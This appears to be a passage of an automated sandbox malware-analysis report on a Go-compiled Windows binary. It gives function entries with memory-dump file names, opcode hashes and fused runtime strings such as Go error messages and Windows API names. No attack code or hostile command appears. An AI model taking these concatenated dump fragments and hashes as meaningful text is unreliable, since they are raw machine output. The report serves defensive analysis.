                                                                                • Associated: 00000000.00000002.1646212559.0000000000E44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E64000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646292181.0000000000E6C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 434d0c3f0ffbfa7ad33c3ea42d301467de73577e13d3713f0d48d055382b932b
                                                                                • Instruction ID: 6051d57d3d835d0dd72d8d2046099e0cd97689013ded0b188c3bb80633fa4cdd
                                                                                • Opcode Fuzzy Hash: 434d0c3f0ffbfa7ad33c3ea42d301467de73577e13d3713f0d48d055382b932b
                                                                                • Instruction Fuzzy Hash: 282122316082048BC70CCF2AC89017EF7E2AFC8300B59857DD4568B6A2EA34A809CA55
                                                                                Function 00B0E0C0 Relevance: .0, Instructions: 14COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1645774859.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000C66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646112196.0000000000E21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646129589.0000000000E26000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646145569.0000000000E27000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646161468.0000000000E28000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646181522.0000000000E39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646197176.0000000000E3A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E64000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646292181.0000000000E6C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 60bd6da54cf403ebdc87279bd144d9dc32c9275f5392d14504d915c74e12558c
                                                                                • Instruction ID: 14fa4662d7bc4756eef2995f5163fd92051155b3ffc24376e049113dbedd846e
                                                                                • Opcode Fuzzy Hash: 60bd6da54cf403ebdc87279bd144d9dc32c9275f5392d14504d915c74e12558c
                                                                                • Instruction Fuzzy Hash: 79E0B6B04083459FC310EF1CC98510ABBE0BB84220F408B5DA8B8473A1D37095088B92
                                                                                Function 00AC47C0 Relevance: 16.6, Strings: 13, Instructions: 399COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • : cannot pass runtime: g is running but p is notruntime: unexpected return pc for schedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]too many references: cannot spliceunexpected , xrefs: 00AC4AF9, 00AC4BA3, 00AC4C2B
                                                                                • , not pointer-byte block (3814697265625Align 2-BytesAlign 4-BytesAlign 8-BytesAssemblyRefOSBSTR_UserFreeBSTR_UserSizeCertOpenStoreClearCustDataCoTaskMemFreeCreateTypeLibDeleteServiceEFI ROM imageEFI byte codeEnumProcessesExitWindowsExFindFirstFileFindNextFileW, xrefs: 00AC4D9B
                                                                                • because dotdotdot in async preempt to non-Go memory , locked to thread2980232238769531254e45544672616d6577: day out of rangeArab Standard TimeBSTR_UserUnmarshalCM_MapCrToWin32ErrCaucasian_AlbanianCertGetNameStringWCloseServiceHandleCommandLineToArgvWCreateDi, xrefs: 00AC4C67
                                                                                • (, xrefs: 00AC4D8B
                                                                                • : pointer not in allocated blockruntime: GetQueuedCompletionStatusEx failed (errno= runtime: use of FixAlloc_Alloc before FixAlloc_Initspan set block with unpopped elements found in resetx509: cannot verify signature: insecure algorithm %v, xrefs: 00AC4D3E
                                                                                • : first argument is : duplicatehandle failedruntime: SyscallN has too many argumentsruntime: out of memory: cannot allocate runtime: typeBitsBulkBarrier with type ryuFtoaFixed32 called with negative prectoo many invalid nam, xrefs: 00AC4D81
                                                                                • : second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)strconv: illegal AppendInt/FormatInt baseunexpected call to os.Exit(0) during testx509: cannot p, xrefs: 00AC4CA9
                                                                                • +, xrefs: 00AC4DCF
                                                                                • : first argument is nilruntime: casfrom_Gscanstatus bad oldval gp=runtime: heapBitsSetTypeGCProg: total bits runtime: releaseSudog with non-nil gp.paramruntime:stoplockedm: lockedg (atomicstatus=transform: inconsistent byte count returnedun, xrefs: 00AC4DC6
                                                                                • nil elem type!no module datano such devicepollCache.lockprotocol errorruntime: full=s.allocCount= semaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.Waittext file busytime.Location(timeEndPeriod, xrefs: 00AC4D54
                                                                                • to finalizer untyped args -thread limit/log/filter.go/log/helper.go1907348632812595367431640625: extra text: Align 16-BytesAlign 32-BytesAlign 64-BytesBstrFromVectorCET CompatibleCertCloseStoreCoInitializeExCoUninitializeControlServiceCreateEventExWCreateMu, xrefs: 00AC4B1B, 00AC4BC5, 00AC4C4D
                                                                                • : pointer not at beginning of allocated blockx509: inner and outer signature algorithm identifiers don't matchx509: issuer name does not match subject from issuing certificatelast data directory entry is a reserved field, must be set to zer, xrefs: 00AC4CEE
                                                                                • , not a function0123456789ABCDEF0123456789abcdef2384185791015625: value of type AddDllDirectory, xrefs: 00AC4CC3
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1645774859.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000C66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646112196.0000000000E21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646129589.0000000000E26000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646145569.0000000000E27000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646161468.0000000000E28000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646181522.0000000000E39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646197176.0000000000E3A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E64000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646292181.0000000000E6C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: : cannot pass runtime: g is running but p is notruntime: unexpected return pc for schedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]too many references: cannot spliceunexpected $ : first argument is : duplicatehandle failedruntime: SyscallN has too many argumentsruntime: out of memory: cannot allocate runtime: typeBitsBulkBarrier with type ryuFtoaFixed32 called with negative prectoo many invalid nam$ : first argument is nilruntime: casfrom_Gscanstatus bad oldval gp=runtime: heapBitsSetTypeGCProg: total bits runtime: releaseSudog with non-nil gp.paramruntime:stoplockedm: lockedg (atomicstatus=transform: inconsistent byte count returnedun$ : pointer not at beginning of allocated blockx509: inner and outer signature algorithm identifiers don't matchx509: issuer name does not match subject from issuing certificatelast data directory entry is a reserved field, must be set to zer$ : pointer not in allocated blockruntime: GetQueuedCompletionStatusEx failed (errno= runtime: use of FixAlloc_Alloc before FixAlloc_Initspan set block with unpopped elements found in resetx509: cannot verify signature: insecure algorithm %v$ : second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)strconv: illegal AppendInt/FormatInt baseunexpected call to os.Exit(0) during testx509: cannot p$ because dotdotdot in async preempt to non-Go memory , locked to thread2980232238769531254e45544672616d6577: day out of rangeArab Standard TimeBSTR_UserUnmarshalCM_MapCrToWin32ErrCaucasian_AlbanianCertGetNameStringWCloseServiceHandleCommandLineToArgvWCreateDi$ to finalizer untyped args -thread limit/log/filter.go/log/helper.go1907348632812595367431640625: extra text: Align 16-BytesAlign 32-BytesAlign 64-BytesBstrFromVectorCET CompatibleCertCloseStoreCoInitializeExCoUninitializeControlServiceCreateEventExWCreateMu$($+$, not a function0123456789ABCDEF0123456789abcdef2384185791015625: value of type AddDllDirectory$, not pointer-byte block (3814697265625Align 2-BytesAlign 4-BytesAlign 8-BytesAssemblyRefOSBSTR_UserFreeBSTR_UserSizeCertOpenStoreClearCustDataCoTaskMemFreeCreateTypeLibDeleteServiceEFI ROM imageEFI byte codeEnumProcessesExitWindowsExFindFirstFileFindNextFileW$nil elem type!no module datano such devicepollCache.lockprotocol errorruntime: full=s.allocCount= semaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.Waittext file busytime.Location(timeEndPeriod
                                                                                • API String ID: 0-576860315
                                                                                • Opcode ID: 1019e2367a003acec4e78c1f7836db8a9b273b6dc115a591baef9a12fedaef40
                                                                                • Instruction ID: 10434afbf141fa5d36e7d00953710aa278b78aee7982196c6db37757029965ad
                                                                                • Opcode Fuzzy Hash: 1019e2367a003acec4e78c1f7836db8a9b273b6dc115a591baef9a12fedaef40
                                                                                • Instruction Fuzzy Hash: D60221B46083418FC714EF24C590B6ABBF1BF88744F16892EE8D98B391E775D944CB86
                                                                                Function 00ABA0C0 Relevance: 14.1, Strings: 11, Instructions: 340COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • runtime: memory allocated by OS [runtime: name offset out of rangeruntime: text offset out of rangeruntime: type offset out of rangescalar has high bit set illegallyslice bounds out of range [%x:%y]stackalloc not on scheduler stackstoplockedm: inconsistent loc, xrefs: 00ABA59B
                                                                                • out of memory allocating heap arena mapruntime: blocked write on free polldescruntime: casfrom_Gscanstatus failed gp=stack growth not allowed in system callsuspendG from non-preemptible goroutinetags don't match (%d vs %+v) %+v %s @%dtraceback: unexpected SPWR, xrefs: 00ABA39C
                                                                                • misrounded allocation in sysAlloc .nameFrom: name too long: : Field index out of range : NumOut of non-func type : array index out of range : chanDir of non-chan type : slice index out of rangeruntime: castogscanstatus old, xrefs: 00ABA570
                                                                                • ) not in usable address space: ...additional frames elided....lib section in a.out corrupted11368683772161602973937988281255684341886080801486968994140625Central Brazilian Standard TimeCertDuplicateCertificateContextMountain Standard Time (Mexico)SetupDiGetDe, xrefs: 00ABA5EF
                                                                                • memory reservation exceeds address space limitos: unexpected result from WaitForSingleObjectpanicwrap: unexpected string after type name: pkcs7: content data is a decryptable data type : slice index out of boundsreleased less than one physica, xrefs: 00ABA623
                                                                                • arena already initializedarray index out of boundsbad status in shrinkstackbad system huge page sizechansend: spurious wakeupcheckdead: no m for timerexplicit tag has no childinconsistent poll.fdMutexinvalid cross-device linkinvalid network interfaceinvalid ob, xrefs: 00ABA37C
                                                                                • ., xrefs: 00ABA62C
                                                                                • , ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:\/???ADTAS, xrefs: 00ABA5C5
                                                                                • region exceeds uintptr range unexpectedruntime: casgstatus: oldval=runtime: no module data for save on system g not allowedunrecognized PE machine: %#xunreserving unaligned regionx509: invalid DSA parametersx509: invalid DSA public keyx509: in, xrefs: 00ABA53B
                                                                                • out of memory allocating allArenaspkcs7: attribute %s does not exist : ChanDir of non-chan type : Field index out of bounds : Field of non-struct type : string index out of range : cannot pass runtime: g is running , xrefs: 00ABA350
                                                                                • out of memory allocating heap arena metadata : funcLayout with interface receiver use of WriteTo with pre-connected connectionx509: internal error: cannot parse domain %qx509: invalid RDNSequence: invalid attributebufio.Scanner: Read returned impossible , xrefs: 00ABA366
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1645774859.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000C66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646112196.0000000000E21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646129589.0000000000E26000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646145569.0000000000E27000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646161468.0000000000E28000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646181522.0000000000E39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646197176.0000000000E3A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E64000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646292181.0000000000E6C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ) not in usable address space: ...additional frames elided....lib section in a.out corrupted11368683772161602973937988281255684341886080801486968994140625Central Brazilian Standard TimeCertDuplicateCertificateContextMountain Standard Time (Mexico)SetupDiGetDe$, ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:\/???ADTAS$.$arena already initializedarray index out of boundsbad status in shrinkstackbad system huge page sizechansend: spurious wakeupcheckdead: no m for timerexplicit tag has no childinconsistent poll.fdMutexinvalid cross-device linkinvalid network interfaceinvalid ob$memory reservation exceeds address space limitos: unexpected result from WaitForSingleObjectpanicwrap: unexpected string after type name: pkcs7: content data is a decryptable data type : slice index out of boundsreleased less than one physica$misrounded allocation in sysAlloc .nameFrom: name too long: : Field index out of range : NumOut of non-func type : array index out of range : chanDir of non-chan type : slice index out of rangeruntime: castogscanstatus old$out of memory allocating allArenaspkcs7: attribute %s does not exist : ChanDir of non-chan type : Field index out of bounds : Field of non-struct type : string index out of range : cannot pass runtime: g is running $out of memory allocating heap arena mapruntime: blocked write on free polldescruntime: casfrom_Gscanstatus failed gp=stack growth not allowed in system callsuspendG from non-preemptible goroutinetags don't match (%d vs %+v) %+v %s @%dtraceback: unexpected SPWR$out of memory allocating heap arena metadata : funcLayout with interface receiver use of WriteTo with pre-connected connectionx509: internal error: cannot parse domain %qx509: invalid RDNSequence: invalid attributebufio.Scanner: Read returned impossible $region exceeds uintptr range unexpectedruntime: casgstatus: oldval=runtime: no module data for save on system g not allowedunrecognized PE machine: %#xunreserving unaligned regionx509: invalid DSA parametersx509: invalid DSA public keyx509: in$runtime: memory allocated by OS [runtime: name offset out of rangeruntime: text offset out of rangeruntime: type offset out of rangescalar has high bit set illegallyslice bounds out of range [%x:%y]stackalloc not on scheduler stackstoplockedm: inconsistent loc
                                                                                • API String ID: 0-1386449106
                                                                                • Opcode ID: 154cd77156eeaa79bc312c87e67464820227f868ec85b2b471e9d6ccd1c9e493
                                                                                • Instruction ID: 001d6dc933ccf83d5b5a8472d36a0449c05ffec9f980917966b5dc2701fff676
                                                                                • Opcode Fuzzy Hash: 154cd77156eeaa79bc312c87e67464820227f868ec85b2b471e9d6ccd1c9e493
                                                                                • Instruction Fuzzy Hash: 10F124B4A083449FC704EF69D18069EBBF5BF98704F45892DE9888B352D7B0E945CF92
                                                                                Function 00AC7CB0 Relevance: 14.0, Strings: 11, Instructions: 296COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • work.full != 0zero parameter with GC prog is unavailable,M3.2.0,M11.1.00601021504Z0700476837158203125: cannot parse <invalid Value>ASCII_Hex_DigitAddDllDirectoryAlign 128-BytesAlign 265-BytesAlign 512-BytesCLSIDFromStringCreateErrorInfoCreateHardLinkWCustomA, xrefs: 00AC7FEE
                                                                                • 8, xrefs: 00AC819A
                                                                                • next= p->m= prev= span=% util(...), i = , not .reloc390625<-chanAnswerArabicAugustBrahmiCarianChakmaCommonCopticENCLogENCMapExpectExportFlags=FormatFridayGOROOTGetACPGothicHangulHatranHebrewHyphenIgnoreImportKaithiKhojkiLepchaLycianLydianMIPS16ModuleMondayNa, xrefs: 00AC806F
                                                                                • wbuf1.n= wbuf2.n=%!(EXTRA %s %q: %s(MISSING)(unknown)*invalid*, Offset=, newval=, oldval=, size = , tail = -07:00:00244140625: status=AuthorityBassa_VahBhaiksukiClassINETCuneiformDiacriticExceptionFindCloseGlobalPtrHex_DigitInheritedInterfaceKhudawadiLocalFre, xrefs: 00AC7F08
                                                                                • jobs= list= m->p= max= min= next= p->m= prev= span=% util(...), i = , not .reloc390625<-chanAnswerArabicAugustBrahmiCarianChakmaCommonCopticENCLogENCMapExpectExportFlags=FormatFridayGOROOTGetACPGothicHangulHatranHebrewHyphenIgnoreImportKaithiKhojkiLepchaLy, xrefs: 00AC8099
                                                                                • flushedWork idlethreads= in host name is nil, not nStackRoots= out of range pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= , gp->status=, not pointer-byte block (3814697265625Align 2-BytesAlign 4-BytesAlign 8-BytesAssemblyRefOS, xrefs: 00AC7EC2
                                                                                • nBSSRoots= p->status= s.nelems= schedtick= span.list= timerslen=%!(BADPREC), elemsize=, npages = -syncWithWU/dev/stderr/dev/stdout30517578125: frame.sp=AssemblyRefBLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256BoundImportClassHESIODClassLayoutCloseHandleCoGetOb, xrefs: 00AC80EE
                                                                                • P has cached GC work at end of mark terminationRtlDosPathNameToRelativeNtPathName_U_WithStatusasn1: Unmarshal recipient value is non-pointer attempting to link in too many shared librariesbufio: reader returned negative count from Readcorrupt PE file. Image ba, xrefs: 00AC7F91
                                                                                • runtime: P runtime: p scheddetailsechost.dllsecur32.dllshell32.dllshort writetracealloc(unreachableuserenv.dllversion.dllwsock32.dll B (goal KiB total, MB stacks, [recovered] allocCount found at *( gcscandone m->gsignal= nDataRoots= nSpanRoots= pages, xrefs: 00AC7E97
                                                                                • in gcMark expecting to see gcphase as _GCmarkterminationnon-empty pointer map passed for non-pointer-size valuespkcs7: unsupported digest %q for encryption algorithm %qprofilealloc called without a P or outside bootstrappingstrings: illegal use of non-zero Bui, xrefs: 00AC8191
                                                                                • runtime: full=s.allocCount= semaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.Waittext file busytime.Location(timeEndPeriod, xrefs: 00AC8045
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1645774859.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000C66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646112196.0000000000E21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646129589.0000000000E26000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646145569.0000000000E27000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646161468.0000000000E28000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646181522.0000000000E39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646197176.0000000000E3A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E64000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646292181.0000000000E6C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: flushedWork idlethreads= in host name is nil, not nStackRoots= out of range pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= , gp->status=, not pointer-byte block (3814697265625Align 2-BytesAlign 4-BytesAlign 8-BytesAssemblyRefOS$ jobs= list= m->p= max= min= next= p->m= prev= span=% util(...), i = , not .reloc390625<-chanAnswerArabicAugustBrahmiCarianChakmaCommonCopticENCLogENCMapExpectExportFlags=FormatFridayGOROOTGetACPGothicHangulHatranHebrewHyphenIgnoreImportKaithiKhojkiLepchaLy$ nBSSRoots= p->status= s.nelems= schedtick= span.list= timerslen=%!(BADPREC), elemsize=, npages = -syncWithWU/dev/stderr/dev/stdout30517578125: frame.sp=AssemblyRefBLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256BoundImportClassHESIODClassLayoutCloseHandleCoGetOb$ next= p->m= prev= span=% util(...), i = , not .reloc390625<-chanAnswerArabicAugustBrahmiCarianChakmaCommonCopticENCLogENCMapExpectExportFlags=FormatFridayGOROOTGetACPGothicHangulHatranHebrewHyphenIgnoreImportKaithiKhojkiLepchaLycianLydianMIPS16ModuleMondayNa$ wbuf1.n= wbuf2.n=%!(EXTRA %s %q: %s(MISSING)(unknown)*invalid*, Offset=, newval=, oldval=, size = , tail = -07:00:00244140625: status=AuthorityBassa_VahBhaiksukiClassINETCuneiformDiacriticExceptionFindCloseGlobalPtrHex_DigitInheritedInterfaceKhudawadiLocalFre$8$P has cached GC work at end of mark terminationRtlDosPathNameToRelativeNtPathName_U_WithStatusasn1: Unmarshal recipient value is non-pointer attempting to link in too many shared librariesbufio: reader returned negative count from Readcorrupt PE file. Image ba$in gcMark expecting to see gcphase as _GCmarkterminationnon-empty pointer map passed for non-pointer-size valuespkcs7: unsupported digest %q for encryption algorithm %qprofilealloc called without a P or outside bootstrappingstrings: illegal use of non-zero Bui$runtime: P runtime: p scheddetailsechost.dllsecur32.dllshell32.dllshort writetracealloc(unreachableuserenv.dllversion.dllwsock32.dll B (goal KiB total, MB stacks, [recovered] allocCount found at *( gcscandone m->gsignal= nDataRoots= nSpanRoots= pages$runtime: full=s.allocCount= semaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.Waittext file busytime.Location(timeEndPeriod$work.full != 0zero parameter with GC prog is unavailable,M3.2.0,M11.1.00601021504Z0700476837158203125: cannot parse <invalid Value>ASCII_Hex_DigitAddDllDirectoryAlign 128-BytesAlign 265-BytesAlign 512-BytesCLSIDFromStringCreateErrorInfoCreateHardLinkWCustomA
                                                                                • API String ID: 0-3575252255
                                                                                • Opcode ID: bcc36360e2662c89ed3bc231da6ee7e930c2b3fc5188d3bc77de1d3dcd050b63
                                                                                • Instruction ID: de24f9a6735d30c83d23ed961d3e73ed5d9816ae5e7e752e3d00e00be4ec5de1
                                                                                • Opcode Fuzzy Hash: bcc36360e2662c89ed3bc231da6ee7e930c2b3fc5188d3bc77de1d3dcd050b63
                                                                                • Instruction Fuzzy Hash: 54D12C74909745CFC704EF66E695B2EBBE1BF88308F45882DE8899B352DB709844CF52
                                                                                Function 00AC75C0 Relevance: 14.0, Strings: 11, Instructions: 260COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverabletimer data corruptiontrace/breakpoint trapunexpected value stepuser defined signal 1user defined signal 2x509: invalid version%SystemR, xrefs: 00AC7957
                                                                                • gcBgMarkWorker: blackening not enabledindex out of range [%x] with length %yinsufficient data for base length typeinternal error: unknown string type %dm changed unexpectedly in cgocallbackgmakechan: invalid channel element typeruntime: blocked read on free po, xrefs: 00AC7A25
